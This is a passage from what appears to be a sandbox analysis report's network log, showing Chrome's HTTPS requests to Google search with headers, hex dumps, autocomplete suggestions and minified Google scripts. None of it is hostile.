2024-12-12 21:40:23 UTC	66	IN	Data Raw: 33 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 3cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
2024-12-12 21:40:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49741	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:25 UTC	1394	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=QVhbZ6XKF6u3i-gP-ZzZoAs.1734039622974&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:25 UTC	1305	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Thu, 12 Dec 2024 21:40:25 GMT Expires: Thu, 12 Dec 2024 21:40:25 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6t8sl2zQgRibulxooaKj0w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:25 UTC	85	IN	Data Raw: 61 65 64 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 6c 61 76 61 6e 74 65 20 77 69 67 67 69 6e 73 20 70 69 74 74 73 66 69 65 6c 64 20 68 69 67 68 20 73 63 68 6f 6f 6c 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 Data Ascii: aed)]}'[[["lavante wiggins pittsfield high school",0,[3,362,143],{"zf":33,"zl":8,"
2024-12-12 21:40:25 UTC	1390	IN	Data Raw: 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 73 65 72 76 69 63 65 74 69 74 61 6e 20 69 70 6f 20 73 74 6f 63 6b 20 70 72 69 63 65 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 70 6c 61 79 6f 66 66 20 62 72 61 63 6b 65 74 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 61 6c 62 65 72 74 73 6f 6e 73 20 6b 72 6f 67 65 72 20 6d 65 72 67 65 72 20 6c 61 77 73 75 69 74 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 Data Ascii: zp":{"gs_ss":"1"}}],["servicetitan ipo stock price",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["college football playoff playoff bracket",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["albertsons kroger merger lawsuit",0,[3,362,143],{"zf":3
2024-12-12 21:40:25 UTC	1329	IN	Data Raw: 68 33 31 6a 6d 4e 63 74 51 67 48 55 76 77 43 2b 36 50 44 35 47 78 37 41 4e 73 56 2f 38 50 77 59 49 6c 42 66 66 51 65 63 4d 43 7a 33 65 4c 45 76 34 70 48 68 33 2f 48 51 35 78 6d 57 69 67 6f 61 49 53 58 4f 36 57 6e 54 53 50 31 59 45 47 44 42 38 74 42 4b 38 63 35 5a 6c 79 63 67 31 7a 36 55 6a 58 37 74 4a 7a 44 2b 41 34 67 48 67 63 71 6e 38 76 45 49 4a 69 31 51 7a 49 6d 7a 2f 68 5a 34 54 64 72 45 4b 45 49 4d 54 65 55 62 6f 47 6b 42 2f 49 34 68 78 34 75 38 45 32 38 6d 6e 33 34 42 64 45 6f 38 67 33 6d 62 61 56 55 54 31 72 54 52 32 36 54 49 64 64 59 36 51 6f 5a 58 4a 57 41 65 54 4b 58 53 34 44 77 64 6d 30 36 70 6b 6c 64 4b 76 47 6e 64 68 54 6e 57 68 6c 4a 63 31 58 74 72 34 55 50 69 32 57 32 4e 69 4b 69 41 4c 56 67 47 47 79 6c 51 66 4c 42 36 67 56 78 4f 79 49 61 Data Ascii: h31jmNctQgHUvwC+6PD5Gx7ANsV/8PwYIlBffQecMCz3eLEv4pHh3/HQ5xmWigoaISXO6WnTSP1YEGDB8tBK8c5Zlycg1z6UjX7tJzD+A4gHgcqn8vEIJi1QzImz/hZ4TdrEKEIMTeUboGkB/I4hx4u8E28mn34BdEo8g3mbaVUT1rTR26TIddY6QoZXJWAeTKXS4Dwdm06pkldKvGndhTnWhlJc1Xtr4UPi2W2NiKiALVgGGylQfLB6gVxOyIa
2024-12-12 21:40:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49742	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:25 UTC	2070	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=NzU6V,syyx,sygo,zGLm3b,syvy,syvz,syvp,DhPYme,syy3,syxy,syy1,syy0,sywi,sywj,syxz,syxw,syxx,KHourd,MpJwZc,UUJqVe,sy7o,sOXFj,sy7n,s39S4,oGtAuc,NTMZac,nAFL3,sy81,sy80,q0xTif,y05UD,sy12k,sy192,sy18w,syx4,sy18p,syx3,syx2,syx1,sy18v,sy13u,sy18m,sy13y,sy18u,sy12g,sy18q,syh2,sy13z,sy18x,sy126,sy18t,sy18r,sy18s,sy18z,sy18h,sy18n,sy18g,sy18l,sy18i,sy18d,sy14u,sy141,sy142,syx9,syxa,epYOx?xjs=s3 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:26 UTC	818	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 118881 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:26 UTC	572	IN	Data Raw: 5f 46 5f 69 6e 73 74 61 6c 6c 43 73 73 28 22 63 2d 77 69 7a 7b 63 6f 6e 74 61 69 6e 3a 73 74 79 6c 65 7d 63 2d 77 69 7a 3e 63 2d 64 61 74 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 55 62 69 38 5a 7b 63 6f 6e 74 61 69 6e 3a 6c 61 79 6f 75 74 20 73 74 79 6c 65 7d 2e 65 61 30 4c 62 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 34 70 78 20 36 70 78 20 72 67 62 61 28 33 32 2c 33 33 2c 33 36 2c 30 2e 32 38 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f Data Ascii: _F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.ea0Lbe{background:#fff;border-radius:24px;box-shadow:0px 4px 6px rgba(32,33,36,0.28);margin-left:-4px;margin-top:0;position:absolute;to
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 31 70 78 7d 2e 42 48 39 72 6e 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 6e 6f 72 6d 61 6c 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 36 70 78 7d 2e 67 49 59 4a 55 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 28 32 34 38 2c 32 34 39 2c 32 35 30 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 30 63 30 63 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 Data Ascii: 4px;text-align:center;letter-spacing:.1px}.BH9rn{align-items:center;display:inline-flex;flex-direction:row;flex-grow:1;justify-content:normal;padding-top:16px}.gIYJUc{background:rgb(248,249,250);border:1px dashed #c0c0c0;border-radius:8px;box-sizing:borde
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 78 7d 2e 44 56 37 74 68 65 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 2c 31 30 33 2c 32 31 30 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 44 56 37 74 68 65 2e 52 69 45 43 66 66 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 44 56 37 74 68 65 3a 68 6f 76 65 72 2c 2e 44 56 37 74 68 65 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 44 56 37 74 68 65 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 41 72 49 41 58 62 7b 66 69 6c 6c 3a 72 67 62 28 32 34 31 2c 32 34 33 2c 32 34 34 29 7d 2e 71 4f 46 4c 73 62 7b 66 69 6c 6c 3a 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 7d 2e Data Ascii: x}.DV7the{color:rgb(25,103,210);cursor:pointer;white-space:nowrap}.DV7the.RiECff:focus{outline:none}.DV7the:hover,.DV7the:hover{text-decoration:underline}.DV7the:focus{text-decoration:underline}.ArIAXb{fill:rgb(241,243,244)}.qOFLsb{fill:rgb(218,220,224)}.
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 32 36 2c 31 31 35 2c 32 33 32 29 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 32 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 32 34 70 78 7d 2e 51 77 62 64 33 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 Data Ascii: 4);color:rgb(26,115,232);cursor:pointer;display:inline-flex;flex-shrink:0;font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:14px;justify-content:center;letter-spacing:.25px;margin-left:8px;outline:0;padding:8px 24px}.Qwbd3:hover{background:rgb
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 2c 5b 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 56 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 44 28 61 2c 33 34 29 7d 3b 5f 2e 57 4c 62 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 31 37 26 31 29 3b 5f 2e 49 76 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 31 39 26 31 29 3b 5f 2e 4a 76 3d 21 21 28 5f 2e 42 68 5b 31 32 5d 3e 3e 32 30 26 31 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 7a 47 4c 6d 33 62 22 29 3b 0a 76 61 72 20 44 4e 63 3d 21 21 28 5f 2e 42 68 5b 31 31 5d 3e 3e 31 35 26 31 29 3b 76 61 72 20 45 4e 63 3d 6e 65 77 20 5f 2e 79 6e 2c 46 4e 63 3d 66 75 6e 63 Data Ascii: ,[]);}catch(e){_._DumpException(e)}try{_.VLb=function(a){return _.D(a,34)};_.WLb=!!(_.Bh[12]>>17&1);_.Iv=!!(_.Bh[12]>>19&1);_.Jv=!!(_.Bh[12]>>20&1);}catch(e){_._DumpException(e)}try{_.y("zGLm3b");var DNc=!!(_.Bh[11]>>15&1);var ENc=new _.yn,FNc=func
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 6d 61 74 63 68 4d 65 64 69 61 26 26 28 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 29 22 29 2e 6d 61 74 63 68 65 73 7c 7c 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 20 72 65 64 75 63 65 29 22 29 2e 6d 61 74 63 68 65 73 29 3f 22 31 22 3a 22 30 22 3b 74 68 69 73 2e 6f 61 3d 61 2e 67 65 74 44 61 74 61 28 22 70 72 6d 22 29 2e 46 62 28 29 3f 22 31 22 3a 22 30 22 7d 3b 48 4e 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 50 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 70 72 6d 32 33 22 2c 74 68 69 73 2e 6b 61 5d 7d 3b 48 4e 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 54 62 3d 66 75 6e 63 74 Data Ascii: matchMedia&&(window.matchMedia("(prefers-reduced-motion)").matches\|\|window.matchMedia("(prefers-reduced-motion: reduce)").matches)?"1":"0";this.oa=a.getData("prm").Fb()?"1":"0"};HNc.prototype.hPb=function(){return["prm23",this.ka]};HNc.prototype.mTb=funct
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 61 26 26 74 68 69 73 2e 6f 61 26 26 74 68 69 73 2e 51 61 2e 70 75 73 68 28 74 68 69 73 2e 6f 61 2e 6c 69 73 74 65 6e 28 61 2c 62 2c 63 2c 64 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 64 2c 65 29 29 7d 3b 5f 2e 4a 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 6f 61 26 26 61 2e 68 62 2e 70 75 73 68 28 49 73 63 28 62 2c 63 29 29 7d 3b 5f 2e 6d 7a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 65 3b 69 66 28 61 2e 4d 61 5b 64 5d 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 28 65 3d 61 2e 4d 61 5b 64 5d 29 26 26 5f 2e 63 61 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 7d 61 2e 4d 61 5b 64 5d 3d 49 73 63 28 62 2c 63 29 7d 3b 5f 2e 6e 7a 3d 66 75 Data Ascii: (a,b,c,d,e){a&&this.oa&&this.Qa.push(this.oa.listen(a,b,c,d===void 0?!1:d,e))};_.Jsc=function(a,b,c){a.oa&&a.hb.push(Isc(b,c))};_.mz=function(a,b,c,d,e){e=e===void 0?!1:e;if(a.Ma[d]){if(!e)return;(e=a.Ma[d])&&_.ca.clearTimeout(e)}a.Ma[d]=Isc(b,c)};_.nz=fu
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 6c 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4e 73 63 28 74 68 69 73 2e 6c 65 66 74 2c 74 68 69 73 2e 74 6f 70 2c 74 68 69 73 2e 77 69 64 74 68 2c 74 68 69 73 2e 68 65 69 67 68 74 29 7d 3b 5f 2e 50 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 77 69 64 74 68 3d 3d 30 26 26 61 2e 68 65 69 67 68 74 3d 3d 30 7d 3b 0a 5f 2e 51 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 21 62 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 63 3d 4d 61 74 68 2e 6d 61 78 28 61 2e 6c 65 66 74 2c 62 2e 6c 65 66 74 29 2c 64 3d 4d 61 74 68 2e 6d 69 6e 28 61 2e 6c 65 66 74 2b 61 2e 77 69 64 74 68 2c 62 2e 6c 65 66 74 2b 62 2e 77 69 64 74 68 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 61 2e 74 6f Data Ascii: lone=function(){return new _.Nsc(this.left,this.top,this.width,this.height)};_.Psc=function(a){return a.width==0&&a.height==0};_.Qsc=function(a,b){if(!b)return!1;var c=Math.max(a.left,b.left),d=Math.min(a.left+a.width,b.left+b.width);return Math.max(a.to
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 65 61 6b 7d 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 5f 2e 43 6d 28 61 2c 62 2c 63 2c 64 2c 65 29 7d 7d 3b 5f 2e 6f 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4d 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 75 6e 6c 69 73 74 65 6e 28 61 2e 73 72 63 2c 61 2e 74 79 70 65 2c 61 2e 6c 69 73 74 65 6e 65 72 2c 61 2e 63 61 70 74 75 72 65 2c 61 2e 68 61 6e 64 6c 65 72 29 7d 3b 76 61 72 20 49 73 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 3d 3d 3d 30 3f 28 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 30 29 2c 30 29 3a 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 61 2c 62 29 7d 3b 0a 5f 2e 6f 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 57 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 26 26 74 Data Ascii: eak}break;default:_.Cm(a,b,c,d,e)}};_.oz.prototype.Ml=function(a){this.unlisten(a.src,a.type,a.listener,a.capture,a.handler)};var Isc=function(a,b){return b===0?(_.ca.setTimeout(a,0),0):_.ca.setTimeout(a,b)};_.oz.prototype.Wf=function(){this.listeners&&t
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 6f 74 6f 74 79 70 65 2e 69 73 45 6d 70 74 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 2b 74 68 69 73 2e 42 61 3d 3d 30 7d 3b 0a 59 73 63 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 77 61 28 74 68 69 73 2e 6f 61 29 3b 69 66 28 21 62 29 7b 66 6f 72 28 62 3d 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 3b 62 3e 30 26 26 21 28 61 2e 6b 61 3e 3d 74 68 69 73 2e 6f 61 5b 62 2d 31 5d 2e 6b 61 29 3b 62 2d 2d 29 74 68 69 73 2e 6f 61 5b 62 5d 3d 74 68 69 73 2e 6f 61 5b 62 2d 31 5d 3b 74 68 69 73 2e 6f 61 5b 62 5d 3d 61 3b 62 3d 62 3d 3d 30 7c 7c 62 3c 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 2d 31 7d 69 66 28 62 7c 7c 21 74 68 69 73 2e Data Ascii: ototype.isEmpty=function(){return this.oa.length+this.Ba==0};Ysc.prototype.addEvent=function(a){var b=a.wa(this.oa);if(!b){for(b=this.oa.length;b>0&&!(a.ka>=this.oa[b-1].ka);b--)this.oa[b]=this.oa[b-1];this.oa[b]=a;b=b==0\|\|b<this.oa.length-1}if(b\|\|!this.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49744	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:25 UTC	1634	OUT	GET /xjs/_/js/md=2/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" 